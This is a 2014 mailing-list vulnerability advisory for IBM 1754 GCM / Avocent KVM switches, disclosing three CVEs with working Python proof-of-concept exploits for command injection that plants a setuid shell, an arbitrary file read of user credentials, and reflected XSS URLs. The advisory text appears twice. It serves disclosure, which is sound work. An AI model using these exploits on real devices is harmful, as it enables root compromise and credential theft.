Alejandro Alvarez
2014-07-21 07:59:47 UTC
*Product description*
The IBM 1754 GCM family provides KVM over IP and serial console management
technology in a single appliance. Versions v1.20.0.22575 and prior are
vulnerables.
Note that this vulnerability is also present in some DELL and probably
other vendors of this rebranded KVM. I contacted Dell but no response has
been received.
*1. Remote code execution *
CVEID: CVE-2014-2085
Description: Improperly sanitized input may allow a remote authenticated
attacker to perform remote code execution on the GCM KVM switch.
PoC of this vulnerability:
#!/usr/bin/python"""
Exploit for Avocent KVM switch v1.20.0.22575.
Remote code execution with privilege elevation.
SessionId (avctSessionId) is neccesary for this to work, so you need a
valid user. Default user is "Admin" with blank password.
After running exploit, connect using telnet to device with user target
(pass: target) then do "/tmp/su -" to gain root (password "root")
alex.a.bravo-***@public.gmane.org
"""
from StringIO import StringIO
import pycurl
import os
sessid = "1111111111"
target = "192.168.0.10"
durl = "https://" + target + "/systest.php?lpres=;%20/usr/
sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%
206755%20/tmp/su%20;"
storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.COOKIE,'avctSessionId=' + sessid)
try:
print "[*] Sending GET to " + target + " with session id " + sessid
+ "..."
c.perform()
c.close()
except:
print ""
finally:
print "[*] Done"
print "[*] Trying telnet..."
print "[*] Login as target/target, then do /tmp/su - and enter password
\"root\""
os.system("telnet " + target)
*2. Arbitrary file read *
CVEID: CVE-2014-3081
Description: This device allows any authenticated user to read arbitrary
files. Files can be anywhere on the target.
PoC of this vulnerability:
#!/usr/bin/python
"""
This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to
read arbitrary files on device.
SessionId (avctSessionId) is neccesary for this to work, so you need a
valid user.
alex.a.bravo-***@public.gmane.org
"""
from StringIO import StringIO
import pycurl
sessid = "1111111111"
target = "192.168.0.10"
file = "/etc/IBM_user.dat"
durl = "https://" + target + "/prodtest.php?engage=video_
bits&display=results&filename=" + file
storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.COOKIE,'avctSessionId=' + sessid)
try:
c.perform()
c.close()
except:
print ""
content = storage.getvalue()
print content.replace("<td>","").replace("</td>","")
*3. Cross site scripting non-persistent*
CVEID: CVE-2014-3080
Description: System is vulnerable to cross-site scripting, caused by
improper validation of user-supplied input. A remote attacker could exploit
this vulnerability using a specially-crafted URL to execute script in a
victim's Web browser within the security context of the hosting Web site,
once the URL is clicked. An attacker could use this vulnerability to steal
the victim's cookie-based authentication credentials.
Examples:
http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E
https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E
*Vendor Response:*
IBM release 1.20.20.23447 firmware
*Timeline:*
2014-05-20 - Vendor (PSIRT) notified
2014-05-21 - Vendor assigns internal ID
2014-07-16 - Patch Disclosed
2014-07-17 - Vulnerability disclosed
*External Information:*
Info about the vulnerability (spanish):
http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html
IBM Security Bulletin:
http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983
The IBM 1754 GCM family provides KVM over IP and serial console management
technology in a single appliance. Versions v1.20.0.22575 and prior are
vulnerables.
Note that this vulnerability is also present in some DELL and probably
other vendors of this rebranded KVM. I contacted Dell but no response has
been received.
*1. Remote code execution *
CVEID: CVE-2014-2085
Description: Improperly sanitized input may allow a remote authenticated
attacker to perform remote code execution on the GCM KVM switch.
PoC of this vulnerability:
#!/usr/bin/python"""
Exploit for Avocent KVM switch v1.20.0.22575.
Remote code execution with privilege elevation.
SessionId (avctSessionId) is neccesary for this to work, so you need a
valid user. Default user is "Admin" with blank password.
After running exploit, connect using telnet to device with user target
(pass: target) then do "/tmp/su -" to gain root (password "root")
alex.a.bravo-***@public.gmane.org
"""
from StringIO import StringIO
import pycurl
import os
sessid = "1111111111"
target = "192.168.0.10"
durl = "https://" + target + "/systest.php?lpres=;%20/usr/
sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%
206755%20/tmp/su%20;"
storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.COOKIE,'avctSessionId=' + sessid)
try:
print "[*] Sending GET to " + target + " with session id " + sessid
+ "..."
c.perform()
c.close()
except:
print ""
finally:
print "[*] Done"
print "[*] Trying telnet..."
print "[*] Login as target/target, then do /tmp/su - and enter password
\"root\""
os.system("telnet " + target)
*2. Arbitrary file read *
CVEID: CVE-2014-3081
Description: This device allows any authenticated user to read arbitrary
files. Files can be anywhere on the target.
PoC of this vulnerability:
#!/usr/bin/python
"""
This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to
read arbitrary files on device.
SessionId (avctSessionId) is neccesary for this to work, so you need a
valid user.
alex.a.bravo-***@public.gmane.org
"""
from StringIO import StringIO
import pycurl
sessid = "1111111111"
target = "192.168.0.10"
file = "/etc/IBM_user.dat"
durl = "https://" + target + "/prodtest.php?engage=video_
bits&display=results&filename=" + file
storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.COOKIE,'avctSessionId=' + sessid)
try:
c.perform()
c.close()
except:
print ""
content = storage.getvalue()
print content.replace("<td>","").replace("</td>","")
*3. Cross site scripting non-persistent*
CVEID: CVE-2014-3080
Description: System is vulnerable to cross-site scripting, caused by
improper validation of user-supplied input. A remote attacker could exploit
this vulnerability using a specially-crafted URL to execute script in a
victim's Web browser within the security context of the hosting Web site,
once the URL is clicked. An attacker could use this vulnerability to steal
the victim's cookie-based authentication credentials.
Examples:
http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E
https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E
*Vendor Response:*
IBM release 1.20.20.23447 firmware
*Timeline:*
2014-05-20 - Vendor (PSIRT) notified
2014-05-21 - Vendor assigns internal ID
2014-07-16 - Patch Disclosed
2014-07-17 - Vulnerability disclosed
*External Information:*
Info about the vulnerability (spanish):
http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html
IBM Security Bulletin:
http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983
--
--
Alejandro Alvarez Bravo
alex.a.bravo-***@public.gmane.org
--
Alejandro Alvarez Bravo
alex.a.bravo-***@public.gmane.org